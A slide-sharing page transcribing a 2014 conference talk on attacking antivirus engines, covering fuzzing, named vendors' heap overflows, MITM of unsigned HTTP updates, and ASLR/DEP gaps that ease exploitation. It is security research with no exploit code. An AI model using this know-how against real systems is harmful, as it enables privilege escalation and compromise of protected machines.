CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
VM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenVM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenTamas K Lengyel
 
VM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingVM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingTamas K Lengyel
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel HackingDeveler S.r.l.
 

Was ist angesagt? (20)

Android Internals
Android InternalsAndroid Internals
Android Internals
 
Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT Suite
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_eng
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysis
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
 
Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer Overflow
 
Vulnserver bufferoverflow
Vulnserver bufferoverflowVulnserver bufferoverflow
Vulnserver bufferoverflow
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with Xen
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardware
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
VM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenVM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with Xen
 
VM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingVM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzing
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programming
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewalls
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel Hacking
 

Andere mochten auch

Program Spring ´15
Program Spring ´15Program Spring ´15
Program Spring ´15Sofia Nyblom
 
Teaching with flickr_braz_tesol_2010
Teaching with flickr_braz_tesol_2010Teaching with flickr_braz_tesol_2010
Teaching with flickr_braz_tesol_2010Michael Coghlan
 
Faapi 09 Panel A Room Of Ones Own
Faapi 09 Panel A Room Of Ones OwnFaapi 09 Panel A Room Of Ones Own
Faapi 09 Panel A Room Of Ones OwnMariel Amez
 
Evaluation beyond the desktop
Evaluation beyond the desktopEvaluation beyond the desktop
Evaluation beyond the desktopThomas Grill
 
La quilla ecologica noviembre del 2012
La quilla ecologica noviembre del 2012La quilla ecologica noviembre del 2012
La quilla ecologica noviembre del 2012manueloyarzun
 
CEU Library Guide 09/10
CEU Library Guide 09/10CEU Library Guide 09/10
CEU Library Guide 09/10CEU
 
Looking for sources
Looking for sourcesLooking for sources
Looking for sourcesE MendezG
 
Newsletter abril 2013
Newsletter abril 2013Newsletter abril 2013
Newsletter abril 2013ProMuy
 
A petőfi irodalmi múzeum portálrendszere v1
A petőfi irodalmi múzeum portálrendszere v1A petőfi irodalmi múzeum portálrendszere v1
A petőfi irodalmi múzeum portálrendszere v1t.zsuzsi17
 
My Caracalla
My Caracalla My Caracalla
My Caracalla agimus
 

Andere mochten auch (20)

Program Spring ´15
Program Spring ´15Program Spring ´15
Program Spring ´15
 
Escolas Privadas
Escolas PrivadasEscolas Privadas
Escolas Privadas
 
Teaching with flickr_braz_tesol_2010
Teaching with flickr_braz_tesol_2010Teaching with flickr_braz_tesol_2010
Teaching with flickr_braz_tesol_2010
 
Faapi 09 Panel A Room Of Ones Own
Faapi 09 Panel A Room Of Ones OwnFaapi 09 Panel A Room Of Ones Own
Faapi 09 Panel A Room Of Ones Own
 
Evaluation beyond the desktop
Evaluation beyond the desktopEvaluation beyond the desktop
Evaluation beyond the desktop
 
Flota sama
Flota samaFlota sama
Flota sama
 
La quilla ecologica noviembre del 2012
La quilla ecologica noviembre del 2012La quilla ecologica noviembre del 2012
La quilla ecologica noviembre del 2012
 
Official MMDG YouTube page
Official MMDG YouTube pageOfficial MMDG YouTube page
Official MMDG YouTube page
 
CEU Library Guide 09/10
CEU Library Guide 09/10CEU Library Guide 09/10
CEU Library Guide 09/10
 
Lastfm
LastfmLastfm
Lastfm
 
Teknikmesse Operaen 2014
Teknikmesse Operaen 2014Teknikmesse Operaen 2014
Teknikmesse Operaen 2014
 
Looking for sources
Looking for sourcesLooking for sources
Looking for sources
 
PS week 10 (SEM2)
PS week 10 (SEM2)PS week 10 (SEM2)
PS week 10 (SEM2)
 
Newsletter abril 2013
Newsletter abril 2013Newsletter abril 2013
Newsletter abril 2013
 
A petőfi irodalmi múzeum portálrendszere v1
A petőfi irodalmi múzeum portálrendszere v1A petőfi irodalmi múzeum portálrendszere v1
A petőfi irodalmi múzeum portálrendszere v1
 
A freemail
A freemailA freemail
A freemail
 
My Caracalla
My Caracalla My Caracalla
My Caracalla
 
Teaching in the USA
Teaching in the USATeaching in the USA
Teaching in the USA
 
TESOL SPAIN
TESOL SPAINTESOL SPAIN
TESOL SPAIN
 
Poder Judicial
Poder JudicialPoder Judicial
Poder Judicial
 

Ähnlich wie 2014 en breaking_av_software_joxeankoret

44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
 
Breaking av software
Breaking av softwareBreaking av software
Breaking av softwareJoxean Koret
 
Breaking Antivirus Software
Breaking Antivirus SoftwareBreaking Antivirus Software
Breaking Antivirus Softwarerahmanprojectd
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuceDb Cooper
 
Introductiontoasp netwindbgdebugging-100506045407-phpapp01
Introductiontoasp netwindbgdebugging-100506045407-phpapp01Introductiontoasp netwindbgdebugging-100506045407-phpapp01
Introductiontoasp netwindbgdebugging-100506045407-phpapp01Camilo Alvarez Rivera
 
Intro to Reverse Engineering
Intro to Reverse EngineeringIntro to Reverse Engineering
Intro to Reverse EngineeringNull Bhubaneswar
 
2016 manta raypresentation_av_scanning_disclaimer
2016 manta raypresentation_av_scanning_disclaimer2016 manta raypresentation_av_scanning_disclaimer
2016 manta raypresentation_av_scanning_disclaimerDoug Koster
 
Compilers and interpreters
Compilers and interpretersCompilers and interpreters
Compilers and interpretersRAJU KATHI
 
Mpeg guide
Mpeg guideMpeg guide
Mpeg guidekimsach
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryonePaul Melson
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Android tools for testers
Android tools for testersAndroid tools for testers
Android tools for testersMaksim Kovalev
 
Security Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsSecurity Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsAntiy Labs
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 

Ähnlich wie 2014 en breaking_av_software_joxeankoret (20)

44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
 
Breaking av software
Breaking av softwareBreaking av software
Breaking av software
 
Breaking Antivirus Software
Breaking Antivirus SoftwareBreaking Antivirus Software
Breaking Antivirus Software
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
 
Introductiontoasp netwindbgdebugging-100506045407-phpapp01
Introductiontoasp netwindbgdebugging-100506045407-phpapp01Introductiontoasp netwindbgdebugging-100506045407-phpapp01
Introductiontoasp netwindbgdebugging-100506045407-phpapp01
 
Intro to Reverse Engineering
Intro to Reverse EngineeringIntro to Reverse Engineering
Intro to Reverse Engineering
 
2016 manta raypresentation_av_scanning_disclaimer
2016 manta raypresentation_av_scanning_disclaimer2016 manta raypresentation_av_scanning_disclaimer
2016 manta raypresentation_av_scanning_disclaimer
 
Compilers and interpreters
Compilers and interpretersCompilers and interpreters
Compilers and interpreters
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
Mpeg guide
Mpeg guideMpeg guide
Mpeg guide
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
Os Selbak
Os SelbakOs Selbak
Os Selbak
 
Android tools for testers
Android tools for testersAndroid tools for testers
Android tools for testers
 
Best free tools for w d a
Best free tools for w d aBest free tools for w d a
Best free tools for w d a
 
Best free tools for win database admin
Best free tools for win database adminBest free tools for win database admin
Best free tools for win database admin
 
Security Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsSecurity Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and Systems
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 

Kürzlich hochgeladen

Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...
Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...
Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...Kayode Fayemi
 
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, YardstickSaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, Yardsticksaastr
 
Presentation on Engagement in Book Clubs
Presentation on Engagement in Book ClubsPresentation on Engagement in Book Clubs
Presentation on Engagement in Book Clubssamaasim06
 
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfThe workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfSenaatti-kiinteistöt
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar TrainingKylaCullinane
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...Sheetaleventcompany
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Delhi Call girls
 
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort ServiceDelhi Call girls
 
Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)Chameera Dedduwage
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lodhisaajjda
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaKayode Fayemi
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfSkillCertProExams
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Hasting Chen
 
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara ServicesVVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara ServicesPooja Nehwal
 
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort ServiceDelhi Call girls
 
Air breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animalsAir breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animalsaqsarehman5055
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCamilleBoulbin1
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIINhPhngng3
 
Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Vipesco
 

Kürzlich hochgeladen (20)

Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...
Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...
Governance and Nation-Building in Nigeria: Some Reflections on Options for Po...
 
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, YardstickSaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
 
Presentation on Engagement in Book Clubs
Presentation on Engagement in Book ClubsPresentation on Engagement in Book Clubs
Presentation on Engagement in Book Clubs
 
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfThe workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar Training
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
 
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 97 Noida Escorts >༒8448380779 Escort Service
 
Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New Nigeria
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
 
ICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdfICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdf
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
 
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara ServicesVVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
 
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
 
Air breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animalsAir breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animals
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptx
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio III
 
Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510
 

2014 en breaking_av_software_joxeankoret

  • 1. Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 360, 2014
  • 2. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 3. Antivirus Engines n  Common features of AV engines: n  Written in C/C++. n  Signatures based engine + heuristics. n  On-access scanners. n  Command line/GUI on-demand scanners. n  Support for compressed file archives. n  Support for packers. n  Support for miscellaneous file formats. n  Advanced common features: n  Packet filters and firewalls. n  Drivers to protect the product, anti-rootkits, etc... n  Anti-exploiting toolkits.
  • 4. Antivirus products or engines n  An antivirus engine is just the core, the kernel, of an antivirus product. n  Some antivirus engines are used by multiple products. n  For example, BitDefender is the most widely used antivirus kernel. n  It's used by so many products like G-Data, eScan, F- Secure, etc... n  Most “big” antivirus companies have their own engine but not all. And some companies, like F-Secure, integrate 3rd party engines in their products. n  In general, during this talk I will refer to AV engines, to the kernels, except when specified the word “product”.
  • 5. Attack surface n  Fact: installing an application in your computer makes you a bit more vulnerable. n  You just increased your attack surface. n  If the application is local: your local attack surface increased. n  If the application is remote: your remote attack surface increased. n  If your application runs with the highest privileges, installs kernel drivers, a packet filter and tries to handle anything your computer may do... n  Your attack surface dramatically increased.
  • 6. Myths and reality n  Antivirus propaganda: n  “We make your computer safer with no performance penalty!” n  “We protect against unknown zero day attacks!”. n  Reality: n  AV engines makes your computer more vulnerable with a varying degree of performance penalty. n  The AV engine is as vulnerable to zero day attacks as the applications it tries to protect from. n  And can even lower the operating system exploiting mitigations, by the way...
  • 7. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 8. Attacking antivirus engines n  AV engines, commonly, are written in non managed languages due to performance reasons. n  Almost all engines written in C and/or C++ with only a few exceptions, like the old MalwareBytes, written in VB6 (!?). n  It translates into buffer overflows, integer overflows, format strings, etc... n  Most AV engines installs operating system drivers. n  It translates into possible local escalation of privileges. n  AV engines must support a long list of file formats: n  Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... n  It translates into bugs in the parsers of such file formats.
  • 9. Attacking antivirus engines n  AV engines not only need to support such large list of file formats but they also need to do this quickly and better than the vendor. n  If an exploit for a new file format appears, customer will ask for support for such files as soon as possible. The longer it takes, the higher the odds of losing a customer moving on to another vendor. n  The producer doesn't need to “support” malformed files. The AV engine actually needs to do so. n  The vendor needs to handle malformed files but only to refuse them as repairing such files is an open door for vulnerabilities. n  Example: Adobe Acrobat
  • 10. Attacking antivirus engines n  Most (if not all...) antivirus engines run with the highest privileges: root or local system. n  If one can find a bug and write an exploit for the AV engine, (s)he just won root or system privileges. n  Most antivirus engines updates via HTTP only protocols: n  If one can MITM the connection (for example, in a LAN) one can install new files and/or replace existing installation files. n  It often translates in completely owning the machine with the AV engine installed as updates are not commonly signed. Yes. They aren't. n  I will show later one of the many vulnerable products...
  • 11. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 12. Vulnerabilities in AV engines n  Started around end of July/beginning of August to find vulnerabilities, for fun, in some AV engines. n  In my spare time, some hours from time to time. n  Found remote and local vulnerabilities in 14 AV engines or AV products. n  Most of them in the first 2 months. n  I tested ~17 engines (I think, I honestly do not remember). n  It says it all. n  I'll talk about some of the vulnerabilities I discovered. n  The following are just a few of them...
  • 13. AV engines vulnerabilities n  Avast: Heap overflow in RPM (reported, fixed and paid Bug Bounty) n  Avg: Heap overflow with Cpio (fixed...)/Multiple vulnerabilities with packers n  Avira: Multiple remote vulnerabilities n  BitDefender: Multiple remote vulnerabilities n  ClamAV:Infinite loop with a malformed PE (reported & fixed) n  Comodo: Heap overflow with Chm n  DrWeb: Multiple remote vulnerabilities (vulnerability with updating engine fixed) n  ESET: Integer overflow with PDF (fixed)/Multiple vulnerabilities with packers n  F-Prot: Heap overflows with multiple packers n  F-Secure: Multiple vulnerabilities in Aqua engine (all the F-Secure own bugs fixed) n  Panda: Multiple local privilege escalations (reported and partially fixed) n  eScan: Multiple remote command injection (all fixed? LOL, I doubt...) n  And many more...
  • 14. How to find such vulnerabilities? n  In my case I used, initially, Nightmare, a fuzzing testing suite of my own. n  Downloaded all the AV engines with a Linux version I was able to find. n  The core is always the same with the only exception of some heuristic engines. n  Also used some tricks to run Windows only AV engines in Linux. n  Fuzzed the command line tool of each AV engine by simply using radamsa + the testing suite of ClamAV, many different EXE packers and some random file formats. n  Results: Dozens of remotely exploitable vulnerabilities. n  Also, I performed basic local and remote checks: n  ASLR, null ACLs, updating protocol, network services, etc...
  • 15. Fuzzing statistics n  A friend of mine convinced me to write a fuzzer and do a “Fuzzing explained” like talk for a private conference. n  Really simple fuzzing engine with a max. of 10 nodes. n  I'm poor... I cannot “start relatively small, with 300 boxes” like Google people does. n  Used this fuzzing suite to fuzz various Linux based AV engines, those I was able to run and debug. n  For that specific talk I did fuzz/test the following ones: n  BitDefender, Comodo, F-Prot, F-Secure, Avast, ClamAV, AVG. n  Results...
  • 16. Initial experiment results n  ClamAV: 1 Remote DOS with a malformed icon resource directory in a PE. n  Avast: One possible RCE due to an uninitialized variable in code handling RPM archives. n  F-Secure: One memory exhaustion bug with CPIO. n  Comodo: 2 heap overflows, one handling CHM files. n  F-Prot: Armadillo, PECompact, ASPack and Yoda's Protector unpackers heap overflows. n  AVG: CPIO and XAR heap overflows. n  BitDefender: Amazing number of bugs. Many likely exploitables.
  • 17. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 18. Exploiting AV engines n  What will be briefly covered: n  Remote exploitation. n  What will be not: n  Local exploitation of local user-land or kernel-land vulnerabilities. n  I have no knowledge about kernel-land, sorry. n  Later on, I will discuss some local vulnerability and give details about how to exploit it but it isn't kernel stuff and is too easy to exploit.
  • 19. Exploiting AV engines n  Exploiting an AV engine is like exploiting any other client-side application. n  Is not like exploiting a browser or a PDF reader. n  Is more like exploiting an Office file format. n  Exploiting memory corruptions in client-side applications remotely can be quite hard nowadays due to ASLR. n  However, AV engines makes too many mistakes too often so, don't worry ;) n  ...
  • 20. Exploiting AV engines n  In general, AV engines are all compiled with ASLR enabled. n  But it's common that only the core modules are compiled with ASLR. n  Not the GUI related programs and libraries, for example. n  Some libraries of the core of some AV engines are not ASLR enabled. n  Check your target/own product, there isn't only one ;)
  • 21. Exploiting AV engines n  Even in “major” AV engines... n  ...there are non ASLR enabled modules. n  ...there are RWX pages at fixed addresses. n  ...they disable DEP. n  Under certain conditions, of course. n  The condition, often, is the emulator.
